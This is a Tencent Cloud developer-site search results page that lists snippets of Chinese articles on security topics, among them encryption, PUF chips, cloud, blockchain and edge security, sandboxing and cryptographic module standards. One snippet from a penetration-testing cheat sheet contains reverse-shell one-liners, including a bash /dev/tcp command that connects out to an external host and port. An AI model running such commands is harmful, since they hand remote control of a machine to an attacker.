- 综合排序
- 最热优先
- 最新优先
- 来自专栏摸鱼网工
数据安全技术基础
安全四要素 机密性 完整性 身份验证 不可抵赖 机密性-数据加密 结局数据机密性的问题 > 算法的分类 【对称加密】: 原理:加密和解密适用同一个密钥,数据传输之间需要先在网络中传输密钥,一旦密泄露, 数据安全就得不到保障,会泄露 【非对称加密】: 原理:将密钥分为两种,公钥和私钥,公钥在网络中传播,私钥为独立保存的秘钥,不再在网络中公开 他的安全性高,但是处理的效率比较低 【混合加密】: 原理:使用非对称加密来保护对称加密的密钥协商阶段
63820编辑于 2022-12-04 - 来自专栏安智客
PUF技术比TrustZone技术更安全?
TrustZone技术是一种安全执行区域概念,是芯片运行状态在共享资源、总线系统的安全态与非安全态的问题。 基于TrustZone技术的TEEOS,形成一个可信执行环境,能够执行某些操作、保护某些资源。 PUF可以被用作唯一且不可篡改的设备标识符。PUF也可以用于安全密钥生成和存储以及随机源。 图:艾矽科技基于PUF技术的安全加密芯片:GIANT I系列 比如,2017年5月艾矽科技推出据称全球首款 以PUF为核心的加密芯片,集成了VIA PUF技术,也是目前安全级别最高的一款安全加密芯片。 比如,恩智浦以物理不可克隆技术(PUF)强化SmartMX2 安全芯片,号称第一个能够为市场带来整合了Intrinsic-ID公司的PUF智能卡和嵌入式安全芯片的公司。 安智客认为,在物联网时代,基于PUF的各种安全芯片应用,与基于TEE技术的各种安全方案都互为补充,共同构筑安全终端的基础。 点击下方阅读原文,深入阅读PUF相关资源。
3K70发布于 2018-04-19 - 来自专栏CSDN技术头条
Forrester:安全专家更倾向云安全技术
“云交付集成安全平台的必要性(Necessity Of Cloud-Delivered Integrated Security Platforms)”的研究表明:安全专业人士认为,利用平台来保障安全性比部署在企业网络上的传统安全应用程序效果更好并且成本更低 安全公司Zscaler--一家提供基于云的扫描、监控通过互联网流量服务公司--发布的报告中显示:百分之九十八的受访者表示他们倾向于综合安全平台,因为其不仅提高了公司的安全性而且一定程度上节约了维护安全成本 此外,据报告显示百分之八十二的受访者表示目前他们正在寻求先进的技术以期在一年内实现该目标,目前只有云计算能做到这一点。这些措施包括智能收集威胁和机器学习,两者均需要云安全平台来收集收据。 安全专家还表示,由于公司目前已采用云计算、移动解决方案以及物联网(IoT)——所有的技术或多或少的与无处不在的连通性有关——只有云解决方案才能确保这些新技术的安全性。 “[安全专家]意识到云交付安全策略既降低了成本又能提供更好的安全防护,但是供应商仍在制造设备”他在新闻发布会上说道,“这就像一个创新者的困境案例”。
1.3K50发布于 2018-02-11 - 来自专栏网络安全文章
信息安全技术 云计算服务安全指南
声明本文是学习GB-T 31167-2014 信息安全技术 云计算服务安全指南. 云服务商具有专业技术团队,能够及时更新或采用先进技术和设备,可以提供更加专业的技术、管理和人员支撑,使客户能获得更加专业和先进的技术服务。 5.2.5数据保护更加困难云计算平台采用虚拟化等技术实现多客户共享计算资源,虚拟机之间的隔离和防护容易受到攻击,跨虚拟机的非授权数据访问风险突出。 图片延伸阅读 更多内容 可以点击下载 GB-T 31167-2014 信息安全技术 云计算服务安全指南. http://github5.com/view/575进一步学习联系我们DB15-T 693—2020 膜下滴灌纸筒甜菜栽培技术规程 内蒙古自治区.pdf
2.9K51编辑于 2023-01-08 - 来自专栏FreeBuf
区块链安全技术总结
0x00 前言 区块链的安全需求越来越多,下面就将这些需求一一拆分,看看区块链安全需求到底是个什么样子。 重点关注以下四个方面: 私钥生成与存储的安全 助记词生成与存储的安全 Keystore生成与存储的安全 和钱包口令生成与存储的安全 针对四个方面,可以总结出多个渗透维度 密钥保存维度:私钥是否明文存储本地 ,在于它的底层原理,在于它的源头,那个技术背书-密码学 区块链中的哪些地方用到了密码学: 1.哈希算法 比特币系统中使用的两个哈希函数分别是:SHA-256,主要用于完成PoW(工作量证明)计算;RIPEMD160 现有的安全措施—算法白盒 静态白盒:算法+密钥+白盒密码技术->算法密码库(白盒库) 静态白盒更新密钥,需要重新生成白盒库。 动态白盒:白盒库无需更新,密钥+白盒密码技术->白盒密钥 白盒密钥传入相匹配的白盒库可以进行正常的加密或解密功能。 实现过程如下图: ?
2.4K41发布于 2018-07-31 - 来自专栏CNCF
边缘计算安全技术概述
我们参考了《边缘计算安全技术综述》,分析总结了边缘计算参考模型中的边缘设备层、通信层和边缘计算层容易遭到的安全攻击,综述了边缘计算中密码安全技术的研究成果,最后给出了边缘计算安全技术研究的几个建议。 边缘计算层的安全攻击 边缘计算模型是一种新兴的技术,其脆弱性尚未得到充分的探索。少数针对边缘计算攻击的研究主要集中在对传感器网络可能的威胁上。本节讨论针对边缘计算的一些攻击场景。 边缘计算的密码安全技术 基于身份识别的密码技术 基于身份标识的密码技术是Shamir A提出的,它使用户的公钥可以很容易地从已知的身份标识信息(如电子邮件地址或移动电话号码)中派生出来,解决了对公钥证书的需求 结语 文中我们总结了边缘计算中设备层、通信层和边缘计算层的安全攻击技术,综述了边缘计算领域能够落地实践的密码安全技术(包括基于身份标识的密码技术、RSA和ECC密码技术、基于配对的密码技术、格密码技术、 然而,由于应用场景众多,接入设备繁杂,数据结构不同,安全需求各异,有很多边缘计算的安全问题需要深入探索,边缘计算安全方面的质量加固任重道远。 扫描二维码 | 加入技术交流群 文章转载自容器魔方。
1.9K20发布于 2021-01-12 - 来自专栏网络技术联盟站
交换安全包含哪些技术?
注意到,如果没有端口镜像技术,除非数据包的目的地是监控PC(所连接的端口),否则报文是不会发向该端口的。因此事实上端口镜像就是将某个特定端口的流量拷贝到某个监控端口,就这么简单。 对于一个职业网络工程师,应该能够从报文层面理解IP数据,进而理解各种协议,以及利用这种技术理解对网络进行管理和排障。许多网络故障都可以通过分析包文来定位。网络工程师的成长之路: 6. 然后从PC telnet交换机,观察抓到的报文,telnet是明文传输的,因此能够通过抓包,将telnet输入的用户名和密码,以及telnet上交换机之后输入的各种操作都抓取下来,因此telnet协议并不安全 温馨提醒:wireshark是非标软件,擅自安装属信息安全违规,因此如若需安装学习该软件的使用,请自行走相关流程或在私人PC上完成。 7.
81120编辑于 2023-03-13 - 来自专栏/root
Web安全渗透攻防技术
-i <&3 >&3 2>&3");' bash 反弹 # 修改IP 端口 bash -i >& /dev/tcp/www.varin.cn/10005 0>&1 nmap 简介:开源免费的网络发现和安全审计工具
26410编辑于 2025-09-28 - 来自专栏简言之
网络安全技术复习
包含认证服务器(AS)和门票授权服务器(TGS) 设计目的:解决分布式网络环境下用户访问网络资源时的安全问题 PKI技术 PKI是基于公钥密码技术,支持公钥管理,提供真实性、保密性、完整性以及可追究性的安全服务 SSL 是一种综合利用对称密钥和非对称密钥技术进行安全通信的工业标准。 6. VPN 是利用 Internet 等公共网络的基础设施,通过隧道技术,为用户提供一条与专网相同的安全通道。 7. VPN 系统中的三种典型技术分别是隧道技术 、身份认证技术和加密技术。 8. PKI PKI是基于公钥密码技术,支持公钥管理,提供真实性、保密性、完整性以及可追究性的安全服务,具有普适性的安全基础设施。 5. 、防火墙等技术入手,构建安全防护体系 2.推广先进信息技术,建立信息安全制度 3.增强防火墙控制,加强病毒防御工作 8.
1.5K31编辑于 2022-12-29 - 来自专栏finclip小程序ide
安全沙箱技术赋能企业共建数字安全生态
几年来,零信任(ZeroTrust,ZT)成为网络安全领域的一个热点话题,甚至被很多人视为网络安全领域的“压倒性”技术趋势。 三、安全沙箱技术在零信任领域的实践案例虚拟世界的“恶意”代码,也只能用虚拟的“牢笼”去“关住”它。安全沙箱(Security Sandbox),就是这么一种数字牢笼,它的形态和技术实现方式有很多种。 FinClip是一种新型的轻应用技术,在FinClip安全沙箱中运行的轻应用,选择了兼容互联网主流的小程序规范。企业IT几乎是无缝掌握这个技术,能迅速投入应用。 )零信任是一种有积极意义的网络安全思想和理念,适应了信息化应用和技术发展趋势,对降低云计算、大数据条件下的网络安全风险有效。 安全沙箱技术的采用,不失为一个短期见效的治标方案,相信早晚会成为企业数字技术安全的标配。
76100编辑于 2022-11-07 - 来自专栏用户8715145的专栏
主机安全技术怎么样 主机安全如何收费
我们日常办公和传输数据都需要用到主机,主机已经成为了工作中必不可少的一部分,但是现在很多的主机频繁遭受到黑客攻击,或者是被恶意网站入侵,很大一部分原因是因为主机并不安全,而现在的主机安全技术越来越发达, 以下就是主机安全技术怎么样的相关内容。 主机安全技术怎么样 现在网络上的主机安全技术厂商比较多,所提供的主机安全技术非常不错,能够为主机提供监控网络环境、防御网络攻击等等,而且当遇到不安全访问的时候,能够快速地进行反应,让管理员能够实时的监管到主机 而且主机安全技术能够让企业的运作变得更加的高效,因为它能够让企业的数字资产变得更加的安全。 随着网络技术的不断发展,现在的主机安全技术是比较成熟的,能够多方位的保护大家的主机,如果想要让企业的业务更加高效和安全的展开,大家一定要有主机安全技术。
8K10编辑于 2021-11-26 - 来自专栏网络安全技术点滴分享
使用eBPF技术保护FastAPI安全
使用eBPF保护FastAPI安全关于API安全FastAPI拥有约24万行代码:➜ fastapi git:(master) git ls-files | xargs wc -l240562 totalAPI PyPi恶意软件包的便利性2023年,pypi.org(Python包索引)因安全事件数量超过审核人员的处理能力而不得不暂时关闭。虽然我们仔细选择依赖项,但不应犹豫使用它们。 Secimport由eBPF提供支持的Secimport通过为Python提供安全沙箱来解决这些问题。使用secimport,可以为代码中的每个模块指定特定的系统调用,以在运行时以极低的成本保护环境。 如果您知道自己在做什么,并且覆盖了所有想要允许的用例,请使用stop_on_violation或kill_on_violation不安全标志来阻止攻击,而不是记录它们。 Avi在业余时间让互联网更安全我是一名面向业务的工程师,热爱安全和AI,具有深刻的安全洞察力。我喜欢破解云...
21110编辑于 2025-10-10 - 来自专栏FreeBuf
安全分析技术的“前世今生”
随着网络世界不断发展,安全威胁也日趋复杂,安全分析在保护企业安全方面发挥着越来越重要的作用。 2021年数据泄露发现和防范的平均时间长达 287 天,由此可见,企业将安全分析纳入其威胁检测和响应计划在当下可谓迫在眉睫。 在过去十年中,安全分析这项技术发生了怎样的变化? 随着这些技术的进步,它们特殊的应用场景也在进步。企业将这项技术用于身份分析(检查身份验证、授权和异常访问)、欺诈(发现异常交易)等场景。 第三代:定制化趋势已成 我们当前正经历着第三代安全分析技术演变,机器学习、行为分析和定制化正在推动着技术创新。 如今这些技术的进步正帮助减少安全团队的工作量,使他们能够更好地、更快地检测和遏制已知和未知的威胁。
45120编辑于 2022-02-24 - 来自专栏程序员互动联盟
【专业技术】Android安全嘛?
安卓有一套自己的安全权限机制,大部分来自linux的权限机制,某些地方也做了延伸,比如linux中的用户概念,在安卓上来说就相当于app。 对于一些刚学习安卓的同学来说,如果之前也没有了解过linux的权限概念,对于安卓的这个安全机制也会比较迷茫,看到一篇文章对于android的这个安全权限机制写的还算不错,推荐初学的同学阅读一下。 1 Android 安全机制概述 Android 是一个权限分离的系统 。
1.4K90发布于 2018-03-15 - 来自专栏FreeBuf
浅析车联网安全技术要点
车联网安全技术如何布局? ? 1、智能汽车安全如何分类? 3、车联网安全技术如何布局? 智能汽车最大安全隐患来自于黑客攻击,而黑客攻击重点是入侵CANBus总线,因此车联网安全技术核心就是围绕保护CANBus总线来展开,具体措施如下(本文属于原创,猫视汽车首发,转载请注明): 其一,车载终端设备安全 ,内部网络通信安全可采用防火墙与智能检测技术,实现车内娱乐、导航等系统与车机内网的安全隔离、访问控制及异常检测;外部网络通信安全则通过加强车与外界(V2X)的认证技术,减少来自外部的各种网络攻击。 总线系统,来实现对汽车的控制;因此车联网安全技术应从车载终端、车联网运营端及车辆通信三个层面进行安全布局。
1.9K61发布于 2018-02-28 - 来自专栏奕知伴解
安全初学者技术涉猎
如果你的目标想成为一个安全人,这无疑是一个相对艰难的历程。为什么听起来像危言耸听一样!其实不然,安全的定义很广可以被应用到任何的领域。至于你会如何去定义安全,我几乎都认同。 扯的有点远,下面梳理一下大概技术罗列: 操作系统方面:我们需要Windows(Windows server,Windows 7,10) ,Linux (Debian Centos Redhat)使用。 运维方面:yaml语言掌握,四剑客(find grep awk sed ),看得懂shell脚本(能力强者可以掌握它) 开发语言:编译语言Golang(开发能力强者JAVA最好)脚本语言python WEB安全攻防 构成,请求,响应,状态码,消息状态) DNS解析过程(递归,迭代) 数据库:MySQL PostgreSQL ,结合Django 调用如:ORM 网络通信:简单的路由协议,静态路由,配置方法,连通性 安全设备维护 :IDS(入侵检测系统)IPS(入侵防御系统)WAF(软件:狗,盾,神,锁,宝;各厂商硬件产品) GitHub ,Freebuf ,安全客,付费知识星球(天下没有免费的午餐,安全更加注重信息不对等性)
45130发布于 2020-06-28 - 来自专栏皮振伟的专栏
虚拟化安全sandbox技术分析
容器是直接运行在host os上的,可以访问host上的所有syscall,安全性上确实还不够。gvisor可以在一定程度上弥补这一点。
3.5K10发布于 2018-07-23 - 来自专栏ThoughtWorks
技术雷达的安全实践|洞见
技术雷达的安全概念 技术雷达是ThoughtWorks的定期发表物,它包含了ThoughtWorks对于前沿技术和实践的观察与理解,是软件工程实践的风向标之一,在2016年4月期技术雷达中,与安全相关的技术与实践有 如何理解安全实践 仅仅在项目启动的时候提出安全的要求,在项目结束前做渗透测试和审查,在现有的技术环境中已经不够了,X网站就是很好的反例。那么是不是越安全越好? 当然威胁建模只是安全战略的一部分,当它和其他技术(如建立跨团队的安全专家,采取自动化安全扫描器)结合使用时,威胁建模才可以真正减轻企业面临的安全风险。 原则:作为安全人员和开发人员的桥梁。 采购标准:用于企业采购软件时进行技术打分的标准。 2017技术雷达 互联网企业所采用业务模式往往是“以隐私换服务”,这间接促成了庞大的隐私黑产、伤害了个人的权益。2017年的技术雷达也体现了业界在隐私问题上的思考。
87580发布于 2018-04-13 - 来自专栏运维开发王义杰
系统安全:软件签名技术
引言 在当代的数字化社会中,系统安全是不能被忽视的一个环节。作为软件开发者或架构师,我们需要了解各种安全机制,以确保我们开发的应用程序能在一个安全的环境中运行。 其中,软件签名技术是一个非常重要的环节。本文将深入探讨软件签名技术的基础概念、工作原理以及它在系统安全中的重要性。 软件签名是什么? 总结 软件签名技术在系统安全中起着至关重要的作用。它不仅能确保软件的出处和完整性,还能防止各种安全威胁,如中间人攻击等。因此我们有必要深入了解和掌握这一技术。 希望这篇文章能帮助大家更好地理解软件签名技术在系统安全中的作用。
87730编辑于 2023-09-21 - 来自专栏安智客
《密码模块安全技术要求》解读
中国密码行业标准化技术委员会分别在2014年、2015年制定了GM/T 0028-2014《密码模块安全技术要求》和GM/T 0039-2015《密码模块安全检测要求》,这个主要是面向产品的密码模块安全认证 硬件、软件、混合,总之,除了芯片外的不好定义的安全产品都可以称之为模块。如 Java 卡中的Java 虚拟机、基于可信执行环境技术的TEE操作系统等。 《安全技术要求》指定了密码模块应该满足的安全需求,为了适应广泛的密码模块应用和环境,标准定义了四个逐次增加且定性的安全级别:一级、二级、三级、四级。 安全三级密码模块能够检测并防护直接访问和探测的物理攻击;执行服务时会验证操作员的身份和权限;能够有效防止电压、温度等环境异常对模块安全性的破坏;具备非入侵式攻击缓解技术的有效性证据和测试方法;有效保护明文关键安全参数或密钥分量的输入和输出 密码产品比密码模块包含的范围更广,密码产品既包含GM/T 0028-2014《密码模块安全技术要求》定义的密码模块,还需满足包含安全芯片及密码服务系统(如CA系统、电子签章系统、动态口令认证系统)等的相关标准规范
6.8K70发布于 2018-03-20
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号